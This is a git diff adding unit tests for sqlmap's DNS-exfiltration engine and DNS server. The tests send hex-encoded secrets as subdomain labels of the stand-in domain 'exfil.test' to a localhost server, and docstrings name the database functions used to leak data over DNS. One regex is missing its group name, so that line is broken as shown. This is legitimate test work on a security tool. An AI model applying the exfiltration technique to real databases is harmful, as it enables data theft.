diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index 598648de0..6701d079c 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -189,7 +189,7 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch 48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -65603f9bbf42cd67a1cf9b3f6277b3af3fdf6b3678fcaa2fe21fe09961f9316c lib/core/settings.py +de4f4a95b30c703518a68d96a904bcf908033be8a0d9a03000a2da163f139303 lib/core/settings.py cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py 70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py @@ -587,6 +587,8 @@ a48c411fea864e6bcd6a1c7e1a35094b8cda8d15088fd9e7b0270542ae20daa9 tests/test_com 9c0a0cd0b2d52a53f75c98c60f87a022354b7c3dc4baaf3fe1e272a0af5b7f0a tests/test_dialectdbms.py e40a49cfa73c45b3c3c6d1d1d00738861e270cb7a07b28f5a5356f9c7c800cf2 tests/test_dialect.py 993a2d4d87c4fbaf261663b069629acc95ee4405aa0c42cf5a8f39649fdb0fff tests/test_dicts.py +a38f3257aa218fa706ddb903c181715b2286619c46aea0097b7d365d18c410c5 tests/test_dns_engine.py +703faac01f38224ba85bd0fc398d939ea034f1d7fd641cdc15da4f77ec049443 tests/test_dns_server.py 9cd5841349bc4db818658d12184929a96f7f279eff1f53ad18a54dbefbd6b276 tests/test_dump_jsonl.py 2bbe4b01f79992cfa8884651fc0a28dbd0e3abb0cbea9eb7eadf1f98ca3c3420 tests/test_encoding.py bb6991260a994fcbe79e05febaa34affd5631d02299fbc626820addd5f6ea4f4 tests/test_error_engine.py diff --git a/lib/core/settings.py b/lib/core/settings.py index e48738fb1..2ef55ebfa 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.135" +VERSION = "1.10.6.136" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tests/test_dns_engine.py b/tests/test_dns_engine.py new file mode 100644 index 000000000..efb2ac881 --- /dev/null +++ b/tests/test_dns_engine.py @@ -0,0 +1,272 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission + +The DNS-exfiltration extraction engine (lib/techniques/dns/use.py dnsUse) and the +channel-detection probe (lib/techniques/dns/test.py dnsTest). + +DNS exfil is normally driven by a back-end DBMS that performs an actual DNS lookup +of an attacker-controlled hostname (Oracle UTL_INADDR, MSSQL xp_dirtree, ...), +encoding the queried data in the subdomain labels which then reach sqlmap's +in-process DNS server. That DBMS behaviour cannot be reproduced locally without a +real DNS-emitting engine, so here we drive the REAL dnsUse()/dnsTest() logic + the +REAL DNSServer (on a high port, no root) and emulate ONLY that one step: a mock +Request.queryPage plays the DBMS - it takes the per-iteration boundaries dnsUse +generated and fires a genuine UDP DNS query for +'prefix..suffix.domain' at the DNS server. + +So the chunking/offset/reassembly loop, the dns_request snippet rendering, the +DNSServer packet parse, pop(prefix,suffix), regex extraction, hex decoding and the +detection-then-disable logic are all exercised for real; if any of them regress +these go red - without a live DBMS. + +NOTE on fidelity: secrets are kept ASCII so the mock's byte-slice chunking matches a +DBMS character-substring exactly. Multi-byte (UTF-8) values, where DBMS SUBSTRING is +character-based and a chunk could split a code point, need the real-DBMS run. +""" + +import binascii +import os +import socket +import struct +import sys +import threading +import time +import unittest + +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +from _testutils import bootstrap, set_dbms +bootstrap() + +from lib.core.agent import agent +from lib.core.common import Backend +from lib.core.data import conf, kb +from lib.core.enums import DBMS +from lib.core.exception import SqlmapNotVulnerableException +from lib.core.settings import DNS_BOUNDARIES_ALPHABET +from lib.core.settings import MAX_DNS_LABEL +from lib.request.connect import Connect +from lib.request.dns import DNSServer +import lib.techniques.dns.use as dnsmod +import lib.techniques.dns.test as dnstestmod + +DNS_PORT = 5355 + +def _build_query(name, tid=b"\x12\x34"): + pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00" + for label in name.split("."): + if label: + pkt += struct.pack("B", len(label)) + label.encode() + return pkt + b"\x00" + b"\x00\x01" + b"\x00\x01" + +class _HighPortDNSServer(DNSServer): + # same logic as the real server (parse/pop/run), just bound high so no root is needed + def __init__(self, port): + self._requests = [] + self._lock = threading.Lock() + self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self._socket.bind(("127.0.0.1", port)) + self._running = False + self._initialized = False + +_CONF = {"dnsDomain": "exfil.test", "hexConvert": False, "api": False, "verbose": 0, "forceDns": False} +_KB = {"dnsTest": True, "dnsMode": False, "bruteMode": False, "safeCharEncode": False} + + +class _DnsCase(unittest.TestCase): + DBMS_NAME = "MySQL" + + @classmethod + def setUpClass(cls): + cls.server = _HighPortDNSServer(DNS_PORT) + cls.server.run() + while not cls.server._initialized: + time.sleep(0.02) + + def setUp(self): + self._saved_conf = {k: conf.get(k) for k in _CONF} + self._saved_kb = {k: kb.get(k) for k in _KB} + self._saved_qp = Connect.queryPage + self._saved_randomStr = dnsmod.randomStr + self._saved_randomInt = dnstestmod.randomInt + self._saved_dnsServer = conf.get("dnsServer") + self._saved_hdbR, self._saved_hdbW = dnsmod.hashDBRetrieve, dnsmod.hashDBWrite + for k, v in _CONF.items(): + conf[k] = v + for k, v in _KB.items(): + kb[k] = v + conf.dnsServer = self.server + # isolate from the session hash DB (avoid cross-test value caching / uninitialized store) + dnsmod.hashDBRetrieve = lambda *a, **k: None + dnsmod.hashDBWrite = lambda *a, **k: None + # MSSQL/PostgreSQL build the payload via the stacked-query injection plumbing + # (agent.prefixQuery/agent.payload, needing a full kb.injection). That plumbing is + # generic - not DNS logic - and the mock oracle ignores the payload, so stub it to a + # pass-through; the DNS-specific snippet/substring/chunking still runs for real. + self._saved_prefixQuery, self._saved_payload = agent.prefixQuery, agent.payload + agent.prefixQuery = lambda expression, *a, **k: expression + agent.payload = lambda place=None, parameter=None, value=None, newValue=None, where=None: newValue or "" + set_dbms(self.DBMS_NAME) + + def tearDown(self): + for k, v in self._saved_conf.items(): + conf[k] = v + for k, v in self._saved_kb.items(): + kb[k] = v + conf.dnsServer = self._saved_dnsServer + Connect.queryPage = self._saved_qp + dnsmod.Request.queryPage = self._saved_qp + dnsmod.randomStr = self._saved_randomStr + dnstestmod.randomInt = self._saved_randomInt + dnsmod.hashDBRetrieve, dnsmod.hashDBWrite = self._saved_hdbR, self._saved_hdbW + agent.prefixQuery, agent.payload = self._saved_prefixQuery, self._saved_payload + + def _install_oracle(self, secret, working=True, force=None): + """ + Installs a mock queryPage that plays the DBMS: for each dnsUse iteration it fires a + real UDP DNS query carrying the next hex chunk of L{secret}. working=False models a + dead DNS channel (the DBMS never emits a lookup). force=(prefix, suffix) pins the + random boundary labels (to construct adversarial cases like a domain/suffix collision). + """ + secret_bytes = secret.encode("utf-8") + boundaries = [] + served = [0] + + real_randomStr = self._saved_randomStr + def spy_randomStr(length=4, alphabet=None, **kw): + if alphabet == DNS_BOUNDARIES_ALPHABET and length == 3: + out = force[len(boundaries) % 2] if force else real_randomStr(length=length, alphabet=alphabet, **kw) + boundaries.append(out) + return out + return real_randomStr(length=length, alphabet=alphabet, **kw) if alphabet is not None else real_randomStr(length=length, **kw) + dnsmod.randomStr = spy_randomStr + + dbms = Backend.getIdentifiedDbms() + chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 + + def oracle(payload=None, *args, **kwargs): + if not working: + return None + prefix, suffix = boundaries[-2], boundaries[-1] + chunk = secret_bytes[served[0]:served[0] + chunk_length] + if chunk: + host = "%s.%s.%s.%s" % (prefix, binascii.hexlify(chunk).decode(), suffix, conf.dnsDomain) + c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + c.settimeout(3) + c.sendto(_build_query(host), ("127.0.0.1", DNS_PORT)) + try: + c.recvfrom(512) + finally: + c.close() + served[0] += len(chunk) + for _ in range(100): + with self.server._lock: + if any(host.encode() in r for r in self.server._requests): + break + time.sleep(0.01) + return None + + Connect.queryPage = staticmethod(oracle) + dnsmod.Request.queryPage = staticmethod(oracle) + + def _extract(self, secret): + self._install_oracle(secret) + return dnsmod.dnsUse("%s AND %d=%d", "user()") + + +class TestDnsExfilEngine(_DnsCase): + DBMS_NAME = "MySQL" + + def test_short_value(self): + self.assertEqual(self._extract("luther"), "luther") + + def test_value_spanning_multiple_dns_labels(self): + # > one DNS label -> forces the chunking/offset/reassembly loop (multiple queries) + secret = "The quick brown fox jumps over the lazy dog 0123456789 abcdef" + self.assertEqual(self._extract(secret), secret) + + def test_exact_chunk_boundary(self): + # length exactly one chunk: last-chunk break condition (len < chunk_length) edge + dbms = Backend.getIdentifiedDbms() + cl = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 + secret = "A" * cl + self.assertEqual(self._extract(secret), secret) + + def test_special_characters(self): + secret = "p@ss W0rd!#%&" + self.assertEqual(self._extract(secret), secret) + + def test_domain_label_colliding_with_suffix(self): + # adversarial: --dns-domain's leading label equals the random suffix. A greedy + # extraction regex would run past the real boundary into the domain and corrupt the + # value; the (lazy) extraction must still recover it exactly. + conf.dnsDomain = "hhh.exfil.test" # leading label 'hhh' == forced suffix + self._install_oracle("luther", force=("ggg", "hhh")) + self.assertEqual(dnsmod.dnsUse("%s AND %d=%d", "user()"), "luther") + + +class TestDnsExfilEngineOracle(TestDnsExfilEngine): + # Oracle: different dns_request snippet (UTL_INADDR.GET_HOST_ADDRESS, '||' concat) and + # SUBSTRC substring template - re-runs the whole battery through the Oracle dialect. + DBMS_NAME = "Oracle" + + +class TestDnsExfilEnginePostgres(TestDnsExfilEngine): + # PostgreSQL: stacked-query branch (agent.payload), plpgsql COPY dns_request snippet, + # 'SUBSTRING((...)::text FROM x FOR y)' substring template. + DBMS_NAME = "PostgreSQL" + + +class TestDnsExfilEngineMssql(TestDnsExfilEngine): + # MSSQL: stacked-query branch, xp_dirtree dns_request snippet, and crucially a SMALLER + # chunk_length (MAX_DNS_LABEL//4 - 2) - exercises the alternate chunking arithmetic. + DBMS_NAME = "Microsoft SQL Server" + + +class TestDnsLabelInvariant(unittest.TestCase): + """The exfil chunk is hex-encoded into ONE DNS label, so 2*chunk_length must never exceed the + 63-octet DNS label limit - otherwise the query carries an invalid (over-long) label and exfil + silently breaks. Guards the chunk_length arithmetic in dnsUse for every supported DBMS.""" + def test_hex_label_within_max_dns_label(self): + for dbms in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL): + chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 + self.assertGreater(chunk_length, 0, "%s: non-positive chunk_length" % dbms) + self.assertLessEqual(2 * chunk_length, MAX_DNS_LABEL, + "%s: hex label (%d) exceeds MAX_DNS_LABEL (%d)" % (dbms, 2 * chunk_length, MAX_DNS_LABEL)) + + +class TestDnsChannelDetection(_DnsCase): + """dnsTest(): probes the channel with a known random integer and disables DNS exfil if + the value doesn't come back (unless --force-dns, which then aborts).""" + DBMS_NAME = "MySQL" + KNOWN = 4815162342 + + def _patch_known_int(self): + dnstestmod.randomInt = lambda *a, **k: self.KNOWN + + def test_detection_success_keeps_channel(self): + self._patch_known_int() + self._install_oracle(str(self.KNOWN), working=True) + dnstestmod.dnsTest("%s AND %d=%d") + self.assertTrue(kb.dnsTest) + self.assertEqual(conf.dnsDomain, "exfil.test") # channel kept + + def test_detection_failure_disables_channel(self): + self._patch_known_int() + self._install_oracle(str(self.KNOWN), working=False) # dead channel + dnstestmod.dnsTest("%s AND %d=%d") + self.assertFalse(kb.dnsTest) + self.assertIsNone(conf.dnsDomain) # exfil turned off + + def test_detection_failure_with_force_dns_raises(self): + self._patch_known_int() + conf.forceDns = True + self._install_oracle(str(self.KNOWN), working=False) + self.assertRaises(SqlmapNotVulnerableException, dnstestmod.dnsTest, "%s AND %d=%d") + + +if __name__ == "__main__": + unittest.main(verbosity=2) diff --git a/tests/test_dns_server.py b/tests/test_dns_server.py new file mode 100644 index 000000000..9e566e3d7 --- /dev/null +++ b/tests/test_dns_server.py @@ -0,0 +1,291 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission + +The DNS server used for DNS-exfiltration (lib/request/dns.py): raw packet parsing +(DNSQuery), fake A-record response crafting, the pop(prefix, suffix) accounting, and +- importantly - resilience: a single malformed packet or a transient send error must +NOT kill the server thread (which would silently lose all further exfiltration). +""" + +import collections +import os +import socket +import struct +import sys +import threading +import time +import unittest + +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")) + +from lib.core.settings import MAX_DNS_REQUESTS +from lib.request.dns import DNSQuery, DNSServer + + +def build_query(name, tid=b"\x12\x34", qtype=1): + """Minimal standard (opcode 0) DNS query packet for L{name} (qtype 1=A, 28=AAAA, ...)""" + pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00" + for label in name.split("."): + if label: + pkt += struct.pack("B", len(label)) + label.encode() + return pkt + b"\x00" + struct.pack(">H", qtype) + b"\x00\x01" + + +class _HighPortDNSServer(DNSServer): + """Real DNSServer logic, bound on a high port (no root, no :53 probe)""" + def __init__(self, port, sock=None, maxlen=MAX_DNS_REQUESTS): + self._requests = collections.deque(maxlen=maxlen) + self._lock = threading.Lock() + if sock is None: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(("127.0.0.1", port)) + self._socket = sock + self._running = False + self._initialized = False + + +class _SendFailOnceSocket(object): + """Wraps a real UDP socket; first sendto() raises (simulated transient failure)""" + def __init__(self, real): + self._real = real + self._sends = 0 + + def recvfrom(self, *a, **k): + return self._real.recvfrom(*a, **k) + + def sendto(self, *a, **k): + self._sends += 1 + if self._sends == 1: + raise RuntimeError("simulated transient sendto failure") + return self._real.sendto(*a, **k) + + def __getattr__(self, name): + return getattr(self._real, name) + + +class TestDNSQuery(unittest.TestCase): + def test_parses_data_bearing_name(self): + q = DNSQuery(build_query("pre.deadbeef.suf.exfil.test")) + self.assertEqual(q._query, b"pre.deadbeef.suf.exfil.test.") + + def test_empty_and_short_packets_do_not_raise(self): + for raw in (b"", b"\x00", b"\x12", b"\x12\x34", b"\x12\x34\x01\x20"): + self.assertEqual(DNSQuery(raw)._query, b"") # no exception, empty query + + def test_unterminated_name_does_not_raise(self): + # a length byte that runs past the buffer, with no null terminator + pkt = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" + b"\x20" + b"abc" + DNSQuery(pkt) # must not raise (slicing past end yields b"", ord guards) + + def test_response_is_valid_A_record(self): + q = DNSQuery(build_query("x.y.z", tid=b"\xab\xcd")) + resp = q.response("127.0.0.1") + self.assertEqual(resp[:2], b"\xab\xcd") # transaction id echoed + self.assertEqual(resp[2:4], b"\x85\x80") # standard response, no error + ip = ".".join(str(b if isinstance(b, int) else ord(b)) for b in resp[-4:]) + self.assertEqual(ip, "127.0.0.1") + + def test_empty_query_yields_empty_response(self): + self.assertEqual(DNSQuery(b"\x00").response("127.0.0.1"), b"") + + +class TestDNSServerRoundTrip(unittest.TestCase): + PORT = 5471 + + @classmethod + def setUpClass(cls): + cls.srv = _HighPortDNSServer(cls.PORT) + cls.srv.run() + while not cls.srv._initialized: + time.sleep(0.02) + + def _send(self, name): + c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + c.settimeout(3) + c.sendto(build_query(name), ("127.0.0.1", self.PORT)) + try: + c.recvfrom(512) + except socket.timeout: + pass + finally: + c.close() + for _ in range(100): + with self.srv._lock: + if any(name.encode() in r for r in self.srv._requests): + return True + time.sleep(0.01) + return False + + def test_roundtrip_and_pop(self): + self.assertTrue(self._send("aaa.cafe.bbb.exfil.test")) + self.assertIsNone(self.srv.pop("zzz", "yyy")) # wrong boundaries + self.assertIsNotNone(self.srv.pop("aaa", "bbb")) # correct boundaries + self.assertIsNone(self.srv.pop("aaa", "bbb")) # consumed only once + + def test_non_a_query_type_still_recorded(self): + # a DBMS resolver may emit AAAA (28) / TXT (16) lookups - the exfiltrated name is in the + # labels regardless of qtype, and the server records before crafting the (A) response + c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + c.settimeout(2) + c.sendto(build_query("ggg.beef.hhh.exfil.test", qtype=28), ("127.0.0.1", self.PORT)) + try: + c.recvfrom(512) + except socket.timeout: + pass + finally: + c.close() + for _ in range(200): + if self.srv.pop("ggg", "hhh"): + return + time.sleep(0.01) + self.fail("AAAA-type query was not recorded (exfil would be lost for AAAA-resolving DBMSes)") + + +class TestDNSServerMemoryBound(unittest.TestCase): + """The server records every received query (it listens on :53); only matching ones are + popped. Unrelated/stray traffic and resolver retries must not grow memory without bound.""" + PORT = 5475 + + def test_requests_are_bounded_and_recent_kept(self): + srv = _HighPortDNSServer(self.PORT, maxlen=50) + srv.run() + while not srv._initialized: + time.sleep(0.02) + c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + for i in range(200): # flood well past the bound + c.sendto(build_query("noise%d.unrelated.test" % i), ("127.0.0.1", self.PORT)) + c.close() + # a legit exfil query right after the flood must still be capturable + c2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); c2.settimeout(2) + c2.sendto(build_query("ppp.d00d.qqq.exfil.test"), ("127.0.0.1", self.PORT)) + try: + c2.recvfrom(512) + except socket.timeout: + pass + finally: + c2.close() + popped = None + for _ in range(200): + popped = srv.pop("ppp", "qqq") + if popped: + break + time.sleep(0.01) + with srv._lock: + n = len(srv._requests) + self.assertLessEqual(n, 50, "request buffer exceeded its bound (%d)" % n) + self.assertIsNotNone(popped, "a fresh exfil query was lost after a flood of stray traffic") + + +class TestDNSServerResilience(unittest.TestCase): + def _make(self, port, sock=None): + srv = _HighPortDNSServer(port, sock=sock) + srv.run() + while not srv._initialized: + time.sleep(0.02) + return srv + + def _query(self, port, name): + c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + c.settimeout(1) + c.sendto(build_query(name), ("127.0.0.1", port)) + try: + c.recvfrom(512) + except socket.timeout: + pass + finally: + c.close() + + def _recorded(self, srv, token, tries=120): + for _ in range(tries): + with srv._lock: + if any(token.encode() in r for r in srv._requests): + return True + time.sleep(0.01) + return False + + def test_survives_transient_send_error(self): + port = 5472 + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + s.bind(("127.0.0.1", port)) + srv = self._make(port, sock=_SendFailOnceSocket(s)) + self._query(port, "aaa.11.bbb.exfil.test") # first sendto raises + self._query(port, "ccc.22.ddd.exfil.test") # must still be served + self.assertTrue(self._recorded(srv, "ccc.22.ddd"), + "DNS server died after one failing sendto (lost subsequent exfil)") + self.assertTrue(srv._running) + + def test_survives_malformed_packets(self): + port = 5473 + srv = self._make(port) + c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + for junk in (b"", b"\x00", b"\xff" * 7, b"\x12\x34\x01\x00\x00\x01" + b"\x20abc"): + c.sendto(junk, ("127.0.0.1", port)) + c.close() + self._query(port, "ok.33.fine.exfil.test") + self.assertTrue(self._recorded(srv, "ok.33.fine"), + "DNS server died on a malformed packet") + + +class TestDNSServerConcurrency(unittest.TestCase): + """Under --threads, many workers fire DNS queries and call pop() while the server thread + appends - all guarded by one lock. Each worker must get back exactly its own data.""" + PORT = 5474 + + @classmethod + def setUpClass(cls): + cls.srv = _HighPortDNSServer(cls.PORT) + cls.srv.run() + while not cls.srv._initialized: + time.sleep(0.02) + + def test_concurrent_send_and_pop_no_crosstalk(self): + import binascii, re + N = 12 + errors = [] + + def worker(i): + # distinct boundary labels per worker (DNS boundary alphabet = letters, no a-f/digits) + prefix = "gg" + chr(ord("g") + i) + suffix = "mm" + chr(ord("g") + i) + secret = ("worker-%02d-secret" % i).encode() + host = "%s.%s.%s.exfil.test" % (prefix, binascii.hexlify(secret).decode(), suffix) + c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + c.settimeout(2) + try: + c.sendto(build_query(host), ("127.0.0.1", self.PORT)) + try: + c.recvfrom(512) + except socket.timeout: + pass + finally: + c.close() + got = None + for _ in range(200): + got = self.srv.pop(prefix, suffix) + if got: + break + time.sleep(0.01) + if not got: + errors.append("worker %d: never popped its query" % i); return + m = re.search(r"%s\.(?P.+?)\.%s" % (prefix, suffix), got, re.I) + if not m or binascii.unhexlify(m.group("r")) != secret: + errors.append("worker %d: cross-talk/corruption got=%r" % (i, got)) + + threads = [threading.Thread(target=worker, args=(i,)) for i in range(N)] + for t in threads: + t.start() + for t in threads: + t.join() + self.assertEqual(errors, [], "concurrency failures: %s" % errors) + # every queued request consumed exactly once -> nothing left behind + self.assertEqual(self.srv.pop("gg" + chr(ord("g")), "mm" + chr(ord("g"))), None) + + +if __name__ == "__main__": + unittest.main(verbosity=2)